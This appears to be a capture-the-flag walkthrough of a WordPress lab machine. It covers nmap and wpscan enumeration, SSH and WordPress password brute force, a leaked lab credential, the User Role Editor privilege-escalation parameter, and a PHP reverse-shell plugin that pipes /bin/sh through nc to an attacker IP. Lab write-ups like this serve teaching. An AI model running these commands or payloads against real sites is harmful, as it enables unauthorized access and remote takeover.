.png)
5 months ago
33 BOOK THIS SPACE FOR AD
ARTICLE AD
Are you ready to infiltrate the machine in front of us? In the new episode of this long-term series, we will infiltrate a new machine with methodological approaches.
We will infiltrate the existing machine using tools and increase the privileges after gaining information.
Let’s start developing your skills, punks!
Define the machine and target IP values as constants on the shell.
Let’s send a standard ping and look at the response to the ICMP message: ping -c 1 $target_ip
It is up.
Using Nmap, let’s get to know the enemy we are facing and discover the open doors. This is one of the most important steps: nmap -sV -sC -A --script=vuln -oN nmap_result.txt -Pn $target_ip
Save this nmap command, you can use it in many scenarios.
-sV: Service version detection. Nmap will attempt to determine the version of the services running on open ports.-sC: Default script scanning. Nmap will use a set of standard scripts from the Nmap Scripting Engine (NSE) to gather additional information about the target.-A: Comprehensive scan. Enables OS detection, version detection, script scanning, and traceroute. This provides detailed information about the target.--script=vuln: Runs NSE scripts that check for vulnerabilities. This specifically targets scripts designed to identify potential vulnerabilities in the target services.-oN nmap_result.txt: Output to a file. Saves the scan results to a file named nmap_result.txt in a human-readable format.-Pn: No ping. Nmap will treat the target as up and will not send initial ping requests to determine if the host is up, which is useful if ICMP is blocked by a firewall.$target_ip: The target IP address or hostname to be scanned.The answer takes some time, but you need to keep your patience.
We have a treasure trove of valuable information.
We discovered that ports 22 (SSH) and 80 (HTTP) were open, and we also realized that the structure in front of us was a WordPress structure. In addition, by revealing the enumerated usernames, we had the opportunity to note the usernames we could potentially attack.
Usernames:
jackwendydannyHTTP pages:
/wp-login.php/robots.txt/readme.html/0Let’s see if it allows logging in with a blank password entry by typing these usernames via SSH.
Nope… Still worth a try. We can still perform brute force on usernames.
We can speed up the process by creating a wordlist and manually recording these usernames.
Run msfconsole: msfconsole -q
Search the scanner types you can use for SSH login.
Then use it.
After checking the mandatory inputs in the Options section, determine the parameters and files.
Just run it.
This brute force takes a long time. While this process continues, we can move on to the next stage.
We were unable to discover a password for SSH.
Let’s set the wordlists we may use as fixed values on the shell. You can find wordlists on /usr/share/wordlists.
Constants like these prevent confusion and prevent you from getting lost when typing complex commands.
It is necessary to define the target IP in our hosts file.
Just ping it again.
So far we are running without errors.
It’s time to start a general investigation using the wpscan tool: wpscan -e u,vp --url ourtargetsite.thm --rua --force
There is so much valuable information, isn’t it?
You can conduct an exploit research based on each version information and application here.
Let’s perform password brute force via WordPress with the following command:
wpscan --url http://ourtargetsite.thm -U usernames_target.txt -P /usr/share/wordlists/fasttrack.txt
We discovered a password for user Wendy: wendy:changelater
Let’s quickly try the SSH connection.
This means that a different password is used for each platform. It didn’t work, but in some scenarios users tend to use the same password for each platform.
Now change ourtargetsite.thm to jack.thm in /etc/hosts file.
We have to go to the Wordpress login page and try the password there.
We have obtained the user, but it seems that this user does not have admin privileges.
Now we can conduct vulnerability research: searchsploit Wordpress 5.3.2
Go to “Profile”. “User Role Editor” plugin is used here. The exploit here gives you the roadmap: https://www.exploit-db.com/exploits/44595
Running the Burp tool will save us time. Then connect to proxy.
Click “Update Profile” and pay attention to the BODY part in the POST method.
Vulnerability advises us to add this value &ure_other_roles=administrator to the end of BODY.
Then forward.
We got that now!
The next thing to do is to add a reverse shell. There are many options for this, let’s talk about some of them.
Run msfconsole again: msfconsole -q
We should use wp admin shell upload.
Check the Options values and edit whatever is necessary.
Then just run.
As the second option, put your machine in listening mode.
Go to “Plugin-Plugin Editor” and paste the code below:
<?php system(‘rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.103.187 21000 >/tmp/f’); ?>
Activate the your custom plugin via “Installed Plugin”.
Wow! Now you have reverse. Stabilize the shell with python -c ‘import pty; pty.spawn(“/bin/bash”)’
$ rlwrap nc -nlvp 21000listening on [any] 21000 ...
connect to [10.4.34.126] from (UNKNOWN) [10.10.16.248] 47424
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn("/bin/bash")'
Don’t give up on hacking.
Code for good.
^-^
Bengali (Bangladesh) · 
English (United States) ·